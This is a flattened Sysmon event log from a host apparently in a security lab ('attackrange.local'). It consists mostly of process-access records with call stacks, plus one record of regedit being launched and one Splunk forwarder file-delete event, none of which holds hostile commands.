12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566308C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.923{266CAFBE-64C5-6064-A500-00000000AE01}43566280C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x800000000000000011081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.923{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.907{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.907{266CAFBE-64C1-6064-9100-00000000AE01}51086184C:\Windows\system32\csrss.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.907{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.907{266CAFBE-64C4-6064-9B00-00000000AE01}49243352C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\Windows.Storage.dll+16e55f|C:\Windows\System32\Windows.Storage.dll+16e1d5|C:\Windows\System32\Windows.Storage.dll+16dcc6|C:\Windows\System32\Windows.Storage.dll+16f138|C:\Windows\System32\Windows.Storage.dll+16daee|C:\Windows\System32\Windows.Storage.dll+fd005|C:\Windows\System32\Windows.Storage.dll+fd384|C:\Windows\System32\Windows.Storage.dll+fc9c0|C:\Windows\System32\Windows.Storage.dll+1663de|C:\Windows\System32\Windows.Storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\system32\windows.cortana.Desktop.dll+42239|C:\Windows\system32\windows.cortana.Desktop.dll+318b3|C:\Windows\system32\
windows.cortana.Desktop.dll+320d4|C:\Windows\system32\windows.cortana.Desktop.dll+7e45|C:\Windows\system32\windows.cortana.Desktop.dll+81c6|C:\Windows\system32\windows.cortana.Desktop.dll+8209 154100x800000000000000011075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.914{266CAFBE-6691-6064-7601-00000000AE01}4304C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXE"C:\Windows\regedit.exe" C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{266CAFBE-64C4-6064-9B00-00000000AE01}4924C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding 10341000x800000000000000011074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246424C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.onecore.dll+1717e|C:\Windows\system32\windows.cortana.onecore.dll+15f51|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\windows.cortana.onecore.dll+12bc0 10341000x800000000000000011067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:09:53.891{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 23542300x800000000000000011065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:53.688{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67F0B96B9321227642D6FA5208CBB49C,SHA256=314AB49569AAA67FE9A6A6579181769DCAFD44A156C308B455E0CB9EDBD39C20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
